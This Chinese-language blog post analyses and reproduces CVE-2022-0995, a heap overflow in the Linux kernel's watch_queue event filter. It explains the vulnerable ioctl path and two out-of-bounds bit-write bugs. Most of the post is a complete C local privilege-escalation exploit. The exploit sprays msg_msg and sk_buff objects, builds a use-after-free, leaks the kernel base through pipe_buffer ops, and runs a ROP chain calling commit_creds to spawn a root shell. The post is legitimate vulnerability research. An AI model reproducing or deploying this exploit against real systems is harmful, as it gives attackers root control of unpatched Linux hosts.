CVE-2022-0995复现 | 196082's blog

前言

其实前两天复现了一个2023的CVE，本来打算写那一个的，但是对于那个CVE更多的是做工作上的适配，在一些小细节上的原理并没有掌握得特别透彻，并且因为是刚刚公开的一个CVE也导致没有更多的文章进行参考，等后面进一步分析一下源码再写。

此次的CVE是存在于观察队列事件通知子系统 (watch_queue event notification subsystem) 中的一个堆溢出漏洞，该漏洞从内核版本5.8伴随着 watch queue subsystem 引入，在 5.17-rc4 得到修复。

基础知识

通用通知机制是建立在标准管道驱动之上的，其可以有效地将来自内核的通知消息拼接到用户打开的管道中，我们可以通过 CONFIG_WATCH_QUEUE 编译选项启用（默认开启）

该机制通过一个以特殊模式打开的管道实现，内核生成的消息被保存到管道内部的循环环形缓冲区中（pipe_buffer 队列），通过 read() 进行读取，由于在某些情况下我们可能想要将添加的内容还原到环上，因此在此类管道上禁用了 splice 以及类似功能（因为这可能导致其与通知消息交织在一起）

管道的所有者应当告诉内核哪些资源其想要通过该管道进行观察，只有连接到该管道上的资源才会往里边插入消息，需要注意的是一个资源可能会与多个管道绑定并同时将消息插入所有管道

若环中没有可用的插槽或可用的预分配的 message buffer（一个管道默认只有 16 个 pipe_buffer ——对应 16 张内存页），则消息将会被丢弃，在这两种情况下，read() 将在读取当前缓冲区的最后一条消息后将 WATCH_META_LOSS_NOTIFICATION 插入输出缓冲区。

Watch Queue API

一个观测队列（watch queue）是由一个应用分配的用以记录通知的缓冲区，其工作原理完全隐藏在管道设备驱动中，但有必要获得一个对其的引用以设置一个观测，可以通过以下 API 进行管理：

struct watch_queue *get_watch_queue(int fd);

由于观测队列在内核中通过实现缓冲区的管道的文件描述符表示，用户空间必须通过系统调用传递该文件描述符，这可以用于从系统调用中查找指向观测队列的不透明指针
void put_watch_queue(struct watch_queue *wqueue);

该函数用以丢弃从 get_watch_queue() 获得的引用

Event Filter

当一个观测队列被创建后，我们可以使用过滤器限制接收的事件：

struct watch_notification_filter {
	__u32	nr_filters;		/* Number of filters */
	__u32	__reserved;		/* Must be 0 */
	struct watch_notification_type_filter filters[];
};
struct watch_notification_filter filter = {
        ...
};
ioctl(fd, IOC_WATCH_QUEUE_SET_FILTER, &filter)

这里主要解释一下结构体中的成员的含义，nr_filters成员表示的是filters[]数组中过滤器的数量，而可以看出来__reserved是必须置0的。需要注意的是其中filters[]数组的类型为watch_notification_type_filter：

struct watch_notification_type_filter {
	__u32	type;			/* Type to apply filter to */
	__u32	info_filter;		/* Filter on watch_notification::info */
	__u32	info_mask;		/* Mask of relevant bits in info_filter */
	__u32	subtype_filter[8];	/* Bitmask of subtypes to filter on */
};

这里也是简单介绍一下其中的结构体的含义，首先是type代表的是需要过滤事件的类型：

enum watch_notification_type {
	WATCH_TYPE_META		= 0,	/* Special record */
	WATCH_TYPE_KEY_NOTIFY	= 1,	/* Key change event notification */
	WATCH_TYPE__NR		= 2
};

info_filter成员与info_mask成员充当的是通知记录的信息字段的过滤器，仅当如下情况才会将通知写入缓冲区：

1	(watch.info & info_mask) == info_filter

subtype_filter成员则是指示我们感兴趣的字类型的bitmask，subtype_filter[0]的0位对应子类型0，1位对应子类型1…

若是上面使用ioctl(fd, IOC_WATCH_QUEUE_SET_FILTER, NULL)则为移出过滤器，此时接受所有来自观测的信息。

watch queue subsystem 中 Event Filter 实现

SYSCALL_DEFINE3(ioctl, unsigned int, fd, unsigned int, cmd, unsigned long, arg)
{
	struct fd f = fdget(fd);
	int error;

	if (!f.file)
		return -EBADF;

	error = security_file_ioctl(f.file, cmd, arg);
	if (error)
		goto out;

	error = do_vfs_ioctl(f.file, fd, cmd, arg);
	if (error == -ENOIOCTLCMD)
		error = vfs_ioctl(f.file, cmd, arg);

out:
	fdput(f);
	return error;
}

首先则是我们调用ioctl是会进入如上函数，并且通过验证之后最终会调用到do_vfs_ioctl函数，而这个函数内部就是一个硕大switch语句根据cmd进行处理，但是IOC_WATCH_QUEUE_SET_FILTER并不在其中，所以最终会调用到vfs_ioctl函数。

long vfs_ioctl(struct file *filp, unsigned int cmd, unsigned long arg)
{
	int error = -ENOTTY;

	if (!filp->f_op->unlocked_ioctl)
		goto out;

	error = filp->f_op->unlocked_ioctl(filp, cmd, arg);
	if (error == -ENOIOCTLCMD)
		error = -ENOTTY;
 out:
	return error;
}
EXPORT_SYMBOL(vfs_ioctl);

可以注意到的事这里其实调用的是filp->f_op->unlocked_ioctl函数，所以首要就是要搞明白这是个什么函数。

前文提到，通知机制是建立在管道上面的，所以这里文件描述符其实也就是管道的，那么我们当前则需要更多的将目光放在管道的创建上面，而管道的创建存在以下调用关系：do_pipe2() => __do_pipe_flags() => create_pipe_files() => alloc_file_pseudo() => alloc_file()。

static struct file *alloc_file(const struct path *path, int flags,
		const struct file_operations *fop)
{
	struct file *file;

	file = alloc_empty_file(flags, current_cred());
	if (IS_ERR(file))
		return file;

	file->f_path = *path;
	file->f_inode = path->dentry->d_inode;
	file->f_mapping = path->dentry->d_inode->i_mapping;
	file->f_wb_err = filemap_sample_wb_err(file->f_mapping);
	file->f_sb_err = file_sample_sb_err(file);
	if ((file->f_mode & FMODE_READ) &&
	     likely(fop->read || fop->read_iter))
		file->f_mode |= FMODE_CAN_READ;
	if ((file->f_mode & FMODE_WRITE) &&
	     likely(fop->write || fop->write_iter))
		file->f_mode |= FMODE_CAN_WRITE;
	file->f_mode |= FMODE_OPENED;
	file->f_op = fop;
	if ((file->f_mode & (FMODE_READ | FMODE_WRITE)) == FMODE_READ)
		i_readcount_inc(path->dentry->d_inode);
	return file;
}

可以看到的是这里对于ops的赋值是发生在这个位置的。

int create_pipe_files(struct file **res, int flags)
{
	struct inode *inode = get_pipe_inode();
	struct file *f;
	int error;

	if (!inode)
		return -ENFILE;

	if (flags & O_NOTIFICATION_PIPE) {
		error = watch_queue_init(inode->i_pipe);
		if (error) {
			free_pipe_info(inode->i_pipe);
			iput(inode);
			return error;
		}
	}

	f = alloc_file_pseudo(inode, pipe_mnt, "",
				O_WRONLY | (flags & (O_NONBLOCK | O_DIRECT)),
				&pipefifo_fops);
	if (IS_ERR(f)) {
		free_pipe_info(inode->i_pipe);
		iput(inode);
		return PTR_ERR(f);
	}

	f->private_data = inode->i_pipe;

	res[0] = alloc_file_clone(f, O_RDONLY | (flags & O_NONBLOCK),
				  &pipefifo_fops);
	if (IS_ERR(res[0])) {
		put_pipe_info(inode, inode->i_pipe);
		fput(f);
		return PTR_ERR(res[0]);
	}
	res[0]->private_data = inode->i_pipe;
	res[1] = f;
	stream_open(inode, res[0]);
	stream_open(inode, res[1]);
	return 0;
}

然而真正传入ops的是这个函数内部中，可以看到ops其实就是pipefifo_fops变量。

const struct file_operations pipefifo_fops = {
	.open		= fifo_open,
	.llseek		= no_llseek,
	.read_iter	= pipe_read,
	.write_iter	= pipe_write,
	.poll		= pipe_poll,
	.unlocked_ioctl	= pipe_ioctl,
	.release	= pipe_release,
	.fasync		= pipe_fasync,
	.splice_write	= iter_file_splice_write,
};

可以看到unlocked_ioctl对应的也就是pipe_ioctl函数。

static long pipe_ioctl(struct file *filp, unsigned int cmd, unsigned long arg)
{
	struct pipe_inode_info *pipe = filp->private_data;
	int count, head, tail, mask;

	switch (cmd) {
	case FIONREAD:
		__pipe_lock(pipe);
		count = 0;
		head = pipe->head;
		tail = pipe->tail;
		mask = pipe->ring_size - 1;

		while (tail != head) {
			count += pipe->bufs[tail & mask].len;
			tail++;
		}
		__pipe_unlock(pipe);

		return put_user(count, (int __user *)arg);

#ifdef CONFIG_WATCH_QUEUE
	case IOC_WATCH_QUEUE_SET_SIZE: {
		int ret;
		__pipe_lock(pipe);
		ret = watch_queue_set_size(pipe, arg);
		__pipe_unlock(pipe);
		return ret;
	}

	case IOC_WATCH_QUEUE_SET_FILTER:
		return watch_queue_set_filter(
			pipe, (struct watch_notification_filter __user *)arg);
#endif

	default:
		return -ENOIOCTLCMD;
	}
}

而在函数内部其实也就是个大的switch语句，并且在最后有一个处理watch_queue_set_filter函数，而漏洞正发生在其中。

漏洞分析

漏洞点一

long watch_queue_set_filter(struct pipe_inode_info *pipe,
			    struct watch_notification_filter __user *_filter)
{
	struct watch_notification_type_filter *tf;
	struct watch_notification_filter filter;
	struct watch_type_filter *q;
	struct watch_filter *wfilter;
	struct watch_queue *wqueue = pipe->watch_queue;
	int ret, nr_filter = 0, i;

	if (!wqueue)
		return -ENODEV;

	if (!_filter) {
		/* Remove the old filter */
		wfilter = NULL;
		goto set;
	}

	/* Grab the user's filter specification */
	if (copy_from_user(&filter, _filter, sizeof(filter)) != 0)
		return -EFAULT;
	if (filter.nr_filters == 0 ||
	    filter.nr_filters > 16 ||
	    filter.__reserved != 0)
		return -EINVAL;

	tf = memdup_user(_filter->filters, filter.nr_filters * sizeof(*tf));
	if (IS_ERR(tf))
		return PTR_ERR(tf);

	ret = -EINVAL;
	for (i = 0; i < filter.nr_filters; i++) {
		if ((tf[i].info_filter & ~tf[i].info_mask) ||
		    tf[i].info_mask & WATCH_INFO_LENGTH)
			goto err_filter;
		/* Ignore any unknown types */
		if (tf[i].type >= sizeof(wfilter->type_filter) * 8)
			continue;
		nr_filter++;
	}

	/* Now we need to build the internal filter from only the relevant
	 * user-specified filters.
	 */
	ret = -ENOMEM;
	wfilter = kzalloc(struct_size(wfilter, filters, nr_filter), GFP_KERNEL);
	if (!wfilter)
		goto err_filter;
	wfilter->nr_filters = nr_filter;

	q = wfilter->filters;
	for (i = 0; i < filter.nr_filters; i++) {
		if (tf[i].type >= sizeof(wfilter->type_filter) * BITS_PER_LONG)
			continue;

		q->type			= tf[i].type;
		q->info_filter		= tf[i].info_filter;
		q->info_mask		= tf[i].info_mask;
		q->subtype_filter[0]	= tf[i].subtype_filter[0];
		__set_bit(q->type, wfilter->type_filter);
		q++;
	}

	kfree(tf);
set:
	pipe_lock(pipe);
	wfilter = rcu_replace_pointer(wqueue->filter, wfilter,
				      lockdep_is_held(&pipe->mutex));
	pipe_unlock(pipe);
	if (wfilter)
		kfree_rcu(wfilter, rcu);
	return 0;

err_filter:
	kfree(tf);
	return ret;
}

首先则是将用户空间的_filter拷贝到内核中，接着就是对结构体中的nr_filters和__reservede成员进行验证。

if (copy_from_user(&filter, _filter, sizeof(filter)) != 0)
  return -EFAULT;
if (filter.nr_filters == 0 ||
    filter.nr_filters > 16 ||
    filter.__reserved != 0)
  return -EINVAL;

接下来通过memdup_user函数将用户态struct watch_notification_type_filter filters[]数组放到临时的内存空间tf中。紧接着将根据filter.nr_filters进行for循环，并对tf中的内容进行校验。待都通过则会根据struct_size(wfilter, filters, nr_filter)生成一个object，而这个宏定义的含义其实是sizeof(wfilter) + sizeof(filters) * nr_filter。并且需要注意的是这里nr_filter并不是任何结构体中的成员，只是函数声明的一个局部变量

for (i = 0; i < filter.nr_filters; i++) {
  if (tf[i].type >= sizeof(wfilter->type_filter) * BITS_PER_LONG)
    continue;

  q->type			= tf[i].type;
  q->info_filter		= tf[i].info_filter;
  q->info_mask		= tf[i].info_mask;
  q->subtype_filter[0]	= tf[i].subtype_filter[0];
  __set_bit(q->type, wfilter->type_filter);
  q++;
}

如上代码片段，在后面通过for循环使用的却是filter.nr_filters并且这里对于type的验证验证和上面的也不相同。

#ifdef CONFIG_64BIT
#define BITS_PER_LONG 64
#else
#define BITS_PER_LONG 32
#endif /* CONFIG_64BIT */

if (tf[i].type >= sizeof(wfilter->type_filter) * 8)

if (tf[i].type >= sizeof(wfilter->type_filter) * BITS_PER_LONG)

所以不难想到的是可以通过指定type的值为这个[0x80, 0x400)区间内的特定值即可实现越界写。

漏洞点二

而第二个漏洞也位于在最后赋值时的__set_bit函数中

#define BIT_MASK(nr)		(UL(1) << ((nr) % BITS_PER_LONG))
#define BIT_WORD(nr)		((nr) / BITS_PER_LONG)

static inline void __set_bit(int nr, volatile unsigned long *addr)
{
	unsigned long mask = BIT_MASK(nr);
	unsigned long *p = ((unsigned long *)addr) + BIT_WORD(nr);

	*p  |= mask;
}

这个函数的作用就是将addr偏移为BIT_WORD(nr)处的BIT_MASK(nr)位置为1，因为type是可控的，所以控制得当的话可以越界置一位为1。

struct watch_type_filter {
	enum watch_notification_type type;
	__u32		subtype_filter[1];	/* Bitmask of subtypes to filter on */
	__u32		info_filter;		/* Filter on watch_notification::info */
	__u32		info_mask;		/* Mask of relevant bits in info_filter */
};

struct watch_filter {
	union {
		struct rcu_head	rcu;
		unsigned long	type_filter[2];	/* Bitmask of accepted types */
	};
	u32			nr_filters;	/* Number of filters */
	struct watch_type_filter filters[];
};

上面的watch_filter长这样。

漏洞利用

网上的有关这个CVE使用的方法几乎都是利用的漏洞二。当然，仔细想一下也会发现漏洞二在利用的过程中更为易用。接着就是思考溢出问题了，若是我们选择一个type为0x30a的话，我们得到的偏移为(0x30a / 64) * 8 = 0x60，所以我们只需要让上面的object的大小为0x60即可影响到后面的object了。所以我们这里选择的nr_filters为4，除去上面的这一个即为3。那么此时内核给wfilter分配的大小为0x18 + 3 * 0x10 = 0x48所以可以申请到0x60的object。这时再根据BIT_MASK计算可得最终结果为0x400。

其实说到这里的时候各位应该都想到了解题方法了吧。对的，可以使用 CVE-2021-22555 即可完成后续利用 (这里不再详细解释了)。

综上，可得exp

#define _GNU_SOURCE
#include <err.h>
#include <errno.h>
#include <inttypes.h>
#include <sched.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/ipc.h>
#include <sys/msg.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <linux/watch_queue.h>
#include <sys/syscall.h>

struct callback_head
{
    struct callback_head *next;
    void (*func)(struct callback_head *head);
} __attribute__((aligned(sizeof(void *))));

#define rcu_head callback_head

struct watch_type_filter
{
    enum watch_notification_type type;
    unsigned int subtype_filter[1]; /* Bitmask of subtypes to filter on */
    unsigned int info_filter;       /* Filter on watch_notification::info */
    unsigned int info_mask;         /* Mask of relevant bits in info_filter */
};

struct watch_filter
{
    union
    {
        struct rcu_head rcu;
        unsigned long type_filter[2]; /* Bitmask of accepted types */
    };
    unsigned int nr_filters; /* Number of filters */
    struct watch_type_filter filters[];
};

void errExit(char *err_msg)
{
    puts(err_msg);
    exit(-1);
}

size_t user_cs, user_ss, user_sp, user_rflags;
void save_status()
{
    __asm__(
        "mov user_cs, cs;"
        "mov user_ss, ss;"
        "mov user_sp, rsp;"
        "pushf;"
        "pop user_rflags;");
    puts("[*]status has been saved.");
}

#define MSG_COPY 040000
#define MSG_TAG 0xAAAAAAAA
#define PRIMARY_MSG_TYPE 0x41
#define SECONDARY_MSG_TYPE 0x42

#define MSG_QUEUE_NUM 4096

#define PRIMARY_MSG_SIZE 96
#define SECONDARY_MSG_SIZE 0x400
#define VICTIM_MSG_TYPE 0x1337

#define SOCKET_NUM 32
#define SK_BUFF_NUM 128
#define PIPE_NUM 256
#define OOB_PIPE_NUM 100

struct list_head
{
    struct list_head *next, *prev;
};

struct msg_msgseg
{
    uint64_t next;
};

struct msg_msg
{
    struct list_head m_list;
    long m_type;
    size_t m_ts;    /* message text size */
    void *next;     /* struct msg_msgseg *next; */
    void *security; /* NULL without SELinux */
    /* the actual message follows immediately */
};

struct pipe_buffer
{
    uint64_t page;
    uint32_t offset, len;
    uint64_t ops;
    uint32_t flags;
    uint32_t padding;
    uint64_t private;
};

struct pipe_buf_operations
{
    uint64_t confirm;
    uint64_t release;
    uint64_t try_steal;
    uint64_t get;
};

struct
{
    long mtype;
    char mtext[PRIMARY_MSG_SIZE - sizeof(struct msg_msg)];
} primary_msg;

struct
{
    long mtype;
    char mtext[SECONDARY_MSG_SIZE - sizeof(struct msg_msg)];
} secondary_msg;

struct
{
    long mtype;
    char mtext[0x1000 - sizeof(struct msg_msg) + 0x1000 - sizeof(struct msg_msgseg)];
} oob_msg;

void get_shell()
{
    if (getuid())
    {
        printf("\033[31m\033[1m[x] Failed to get the root!\033[0m\n");
        exit(-1);
    }
    printf("\033[32m\033[1m[+] Successful to get the root. Execve root shell now...\033[0m\n");
    system("/bin/sh");
}

void trigger_overflow(int oob_pipe[2])
{
    struct watch_notification_filter *wfilter;
    unsigned int nfilters;

    nfilters = 4;
    wfilter = (struct watch_notification_filter *)
        calloc(1, sizeof(struct watch_notification_filter) + nfilters * sizeof(struct watch_notification_type_filter));
    wfilter->nr_filters = nfilters;

    for (int i = 0; i < (nfilters - 1); i++)
        wfilter->filters[i].type = 1;

    wfilter->filters[nfilters - 1].type = 0x30a;

    if (ioctl(oob_pipe[0], IOC_WATCH_QUEUE_SET_FILTER, wfilter) < 0)
        errExit("failed to ioctl IOC_WATCH_QUEUE_SET_FILTER!");

    free(wfilter);
}

int main()
{
    save_status();

    int oob_pipe_fd[2];
    int i = 0;
    char *buf = malloc(0x2000);
    int sk_sockets[SOCKET_NUM][2];
    int msqid[MSG_QUEUE_NUM];
    int victim_qid = -1;
    char fake_secondary_msg[704];
    int oob_qid = -1;
    struct msg_msg *nearby_msg;
    struct msg_msg *nearby_msg_prim;
    int pipe_fd[PIPE_NUM][2];
    cpu_set_t cpu_set;

    CPU_ZERO(&cpu_set);
    CPU_SET(0, &cpu_set);
    sched_setaffinity(getpid(), sizeof(cpu_set), &cpu_set);

    for (int i = 0; i < SOCKET_NUM; i++)
        if (socketpair(AF_UNIX, SOCK_STREAM, 0, sk_sockets[i]) < 0)
            errExit("failed to create socket pair!");

    for (int i = 0; i < MSG_QUEUE_NUM; i++)
    {
        if ((msqid[i] = msgget(IPC_PRIVATE, 0666 | IPC_CREAT)) < 0)
            errExit("failed to create msg_queue!");
    }

    puts("\n\033[34m\033[1m[*] spray msg_msg, construct overlapping object\033[0m");

    memset(&primary_msg, 0, sizeof(primary_msg));
    memset(&secondary_msg, 0, sizeof(secondary_msg));
    *(long *)&primary_msg = PRIMARY_MSG_TYPE;
    *(long *)&secondary_msg = SECONDARY_MSG_TYPE;
    *(int *)&primary_msg.mtext[0] = MSG_TAG;
    *(int *)&secondary_msg.mtext[0] = MSG_TAG;
    strcpy(&primary_msg.mtext[0x8], "this is first msg_msg!");

    if (pipe2(oob_pipe_fd, O_NOTIFICATION_PIPE) < 0)
        errExit("failed to create O_NOTIFICATION_PIPE!");

    for (int i = 0; i < MSG_QUEUE_NUM; i++)
    {
        *(int *)&primary_msg.mtext[0] = MSG_TAG;
        *(int *)&primary_msg.mtext[4] = i;
        if (msgsnd(msqid[i], &primary_msg,
                   sizeof(primary_msg) - 8, 0) < 0)
            errExit("failed to send primary msg!");

        *(int *)&secondary_msg.mtext[0] = MSG_TAG;
        *(int *)&secondary_msg.mtext[4] = i;
        if (msgsnd(msqid[i], &secondary_msg,
                   sizeof(secondary_msg) - 8, 0) < 0)
            errExit("failed to send secondary msg!");
    }

    puts("[*] Create holes in primary msg_msg...");
    for (int i = 0; i < MSG_QUEUE_NUM; i += 1024)
    {
        if (msgrcv(msqid[i], &primary_msg, sizeof(primary_msg), PRIMARY_MSG_TYPE, 0) < 0)
        {
            errExit("failed to read msg!");
        }
    }

    trigger_overflow(oob_pipe_fd);

    puts("\n\033[34m\033[1m[*] construct UAF\033[0m");

    for (int i = 0; i < MSG_QUEUE_NUM; i++)
    {
        if (i % 1024 == 0)
        {
            continue;
        }
        if (msgrcv(msqid[i], &secondary_msg, sizeof(secondary_msg) - 8, 1, MSG_COPY | IPC_NOWAIT) < 0)
        {
            errExit("failed to read msg!");
        }
        if (*(int *)&secondary_msg.mtext[4] != i)
        {
            victim_qid = i;
            oob_qid = *(int *)&secondary_msg.mtext[4];
        }
    }
    if (victim_qid == -1 || oob_qid == -1)
    {
        errExit("[-] failed find victim msg!");
    }
    printf("[+] find victim id: %d, oob id: %d\n", victim_qid, oob_qid);

    if (msgrcv(msqid[oob_qid], &secondary_msg, sizeof(secondary_msg), SECONDARY_MSG_TYPE, 0) < 0)
    {
        errExit("failed to read msg!");
    }

    ((struct msg_msg *)fake_secondary_msg)->m_list.next = NULL;
    ((struct msg_msg *)fake_secondary_msg)->m_list.prev = NULL;
    ((struct msg_msg *)fake_secondary_msg)->m_type = NULL;
    ((struct msg_msg *)fake_secondary_msg)->m_ts = 0x1000 - sizeof(struct msg_msg);
    ((struct msg_msg *)fake_secondary_msg)->next = NULL;
    ((struct msg_msg *)fake_secondary_msg)->security = NULL;

    for (int i = 0; i < SOCKET_NUM; i++)
    {
        for (int j = 0; j < SK_BUFF_NUM; j++)
        {
            if (write(sk_sockets[i][0], fake_secondary_msg, sizeof(fake_secondary_msg)) < 0)
            {
                errExit("failed to spray sk_buff!");
            }
        }
    }

    if (msgrcv(msqid[victim_qid], &oob_msg, sizeof(oob_msg) - 8, 1, MSG_COPY | IPC_NOWAIT) < 0)
    {
        errExit("failed to read victim msg!");
    }

    if (*(int *)&oob_msg.mtext[SECONDARY_MSG_SIZE] != MSG_TAG)
        errExit("failed to rehit the UAF object!");

    nearby_msg = (struct msg_msg *)&oob_msg.mtext[(SECONDARY_MSG_SIZE - sizeof(struct msg_msg))];
    printf("\033[32m\033[1m[+] addr of primary msg of msg nearby victim: \033[0m%p\n",
           nearby_msg->m_list.prev);

    for (int i = 0; i < SOCKET_NUM; i++)
    {
        for (int j = 0; j < SK_BUFF_NUM; j++)
        {
            if (read(sk_sockets[i][1], fake_secondary_msg, sizeof(fake_secondary_msg)) < 0)
            {
                errExit("failed to release sk_buff!");
            }
        }
    }

    uint64_t search_addr = (unsigned long *)nearby_msg->m_list.prev;
    search_addr = search_addr - 8;

    ((struct msg_msg *)fake_secondary_msg)->m_list.next = NULL;
    ((struct msg_msg *)fake_secondary_msg)->m_list.prev = NULL;
    ((struct msg_msg *)fake_secondary_msg)->m_type = NULL;
    ((struct msg_msg *)fake_secondary_msg)->m_ts = sizeof(oob_msg.mtext);
    ((struct msg_msg *)fake_secondary_msg)->next = search_addr;
    ((struct msg_msg *)fake_secondary_msg)->security = NULL;
    for (int i = 0; i < SOCKET_NUM; i++)
    {
        for (int j = 0; j < SK_BUFF_NUM; j++)
        {
            if (write(sk_sockets[i][0], fake_secondary_msg, sizeof(fake_secondary_msg)) < 0)
            {
                errExit("failed to spray sk_buff!");
            }
        }
    }
    if (msgrcv(msqid[victim_qid], &oob_msg, sizeof(oob_msg), 1, MSG_COPY | IPC_NOWAIT) < 0)
    {
        errExit("failed to read victim msg!");
    }

    if (*(int *)&oob_msg.mtext[0x1000] != MSG_TAG)
        errExit("failed to rehit the UAF object!");

    nearby_msg_prim = (struct msg_msg *)&oob_msg.mtext[0x1000 - sizeof(struct msg_msg)];
    uint64_t victim_addr = (unsigned long *)(nearby_msg_prim->m_list.next);
    victim_addr = victim_addr - 0x400;

    printf("\033[32m\033[1m[+] addr of msg next to victim: \033[0m%p\n",
           nearby_msg_prim->m_list.next);
    printf("\033[32m\033[1m[+] addr of msg UAF object: \033[0m%p\n", victim_addr);

    for (int i = 0; i < SOCKET_NUM; i++)
    {
        for (int j = 0; j < SK_BUFF_NUM; j++)
        {
            if (read(sk_sockets[i][1], fake_secondary_msg, sizeof(fake_secondary_msg)) < 0)
            {
                errExit("failed to release sk_buff!");
            }
        }
    }
    puts("\n\033[34m\033[1m[*] spray pipe_buffer to leak kernel base\033[0m");

    ((struct msg_msg *)fake_secondary_msg)->m_list.next = victim_addr + 0x800;
    ((struct msg_msg *)fake_secondary_msg)->m_list.prev = victim_addr + 0x800;
    ((struct msg_msg *)fake_secondary_msg)->m_type = VICTIM_MSG_TYPE;
    ((struct msg_msg *)fake_secondary_msg)->m_ts = 1024 - 0x30;
    ((struct msg_msg *)fake_secondary_msg)->next = NULL;
    ((struct msg_msg *)fake_secondary_msg)->security = NULL;

    for (int i = 0; i < SOCKET_NUM; i++)
    {
        for (int j = 0; j < SK_BUFF_NUM; j++)
        {
            if (write(sk_sockets[i][0], fake_secondary_msg, sizeof(fake_secondary_msg)) < 0)
            {
                errExit("failed to spray sk_buff!");
            }
        }
    }
    if (msgrcv(msqid[victim_qid], &secondary_msg, sizeof(secondary_msg), VICTIM_MSG_TYPE, IPC_NOWAIT | MSG_NOERROR) < 0)
    {
        errExit("failed to read victim msg!");
    }

    for (int i = 0; i < PIPE_NUM; i++)
    {
        if (pipe(pipe_fd[i]) < 0)
            errExit("failed to create pipe!");

        if (write(pipe_fd[i][1], "196082", 6) < 0)
            errExit("failed to write the pipe!");
    }
    struct pipe_buffer *pipe_buf_ptr = (struct pipe_buffer *)&fake_secondary_msg;
    uint64_t kernel_addr, kernel_offset, kernel_base;
    for (int i = 0; i < SOCKET_NUM; i++)
    {
        for (int j = 0; j < SK_BUFF_NUM; j++)
        {
            if (read(sk_sockets[i][1], &fake_secondary_msg,
                     sizeof(fake_secondary_msg)) < 0)
                errExit("failed to release sk_buff!");

            if (pipe_buf_ptr->ops > 0xffffffff81000000)
            {
                printf("\033[32m\033[1m[+] got pipe_buf_ops: \033[0m%p\n",
                       pipe_buf_ptr->ops);
                kernel_addr = (unsigned long *)(pipe_buf_ptr->ops);
                kernel_offset = (kernel_addr - 0xffffffff8203fe40);
                kernel_base = 0xffffffff81000000 + kernel_offset;
            }
        }
    }
    printf("\033[32m\033[1m[+] kernel base: \033[0m%p \033[32m\033[1moffset: \033[0m%p\n",
           kernel_base, kernel_offset);

    puts("\n\033[34m\033[1m[*] hijack the ops of pipe_buffer, gain root privilege\033[0m");

    unsigned long pop_rdi = 0xffffffff810938f0 + kernel_offset;
    unsigned long init_cred = 0xffffffff82c6d580 + kernel_offset;
    unsigned long commit_cred = 0xffffffff810d25c0 + kernel_offset;
    unsigned long swapgs_restore_regs_and_return_to_usermode = 0xffffffff81c00ff0 + kernel_offset;
    unsigned long push_rsi_pop_rsp_pop_4reg_ret = 0xffffffff812dbede + kernel_offset;

    pipe_buf_ptr->page = *(uint64_t *)"196082";
    pipe_buf_ptr->ops = victim_addr + 0x100;

    struct pipe_buf_operations *ops_ptr = (struct pipe_buf_operations *)&fake_secondary_msg[0x100];
    ops_ptr->release = push_rsi_pop_rsp_pop_4reg_ret;

    int rop = 0;
    unsigned long *rop_chain;

    rop_chain = (uint64_t *)&fake_secondary_msg[0x20];
    rop_chain[rop++] = pop_rdi;
    rop_chain[rop++] = init_cred;
    rop_chain[rop++] = commit_cred;
    rop_chain[rop++] = swapgs_restore_regs_and_return_to_usermode + 0x16;
    rop_chain[rop++] = 0;
    rop_chain[rop++] = 0;
    rop_chain[rop++] = get_shell;
    rop_chain[rop++] = user_cs;
    rop_chain[rop++] = user_rflags;
    rop_chain[rop++] = user_sp;
    rop_chain[rop++] = user_ss;

    for (int i = 0; i < SOCKET_NUM; i++)
    {
        for (int j = 0; j < SK_BUFF_NUM; j++)
        {
            if (write(sk_sockets[i][0], fake_secondary_msg, sizeof(fake_secondary_msg)) < 0)
            {
                errExit("failed to spray sk_buff!");
            }
        }
    }

    for (int i = 0; i < PIPE_NUM; i++)
    {
        close(pipe_fd[i][0]);
        close(pipe_fd[i][1]);
    }

    return 0;
}

pipe_buffer？

这里主要说的是向pipe_buffer说yes! 这篇文章中的利用手法。

不太推荐，不过需要修改一下type的值为0x306，如果继续保持0x30a的话结果是偏移0x400这样对于pipe_buffer来说过于大了，容易飞出去，所以修改到0x40效果更佳。(不过我不知道为什么每次申请的时候他都给我结尾为0x40和0xc0的，好像就是故意的🤮)

虽然我们可以达到上图，但是在后续的利用中会出现一些问题，首先就是pipe对于申请数量的限制，超过510个时就出现了报错，这样会使成功率大打折扣。其次就是这里是页级的UAF，正如前面的所说，申请的数量较少那么我们在后续对pipe修改size分配堆块的时候从刚刚释放的页面内分配的概率又进一步减小了。当然，面对第二个问题我们可以事先分配很多object用于消耗内存中的slab。但是第一个问题却是硬伤无法解决，所以就我看来如果遇到页级的off by one/null这样的漏洞需要事先配置好堆风水的情况以外都不是特别推荐使用这一方法。

参考链接:

https://arttnba3.cn/2022/04/06/CVE-0X08-CVE-2022-0995/

https://elixir.bootlin.com/linux/v5.17-rc3/source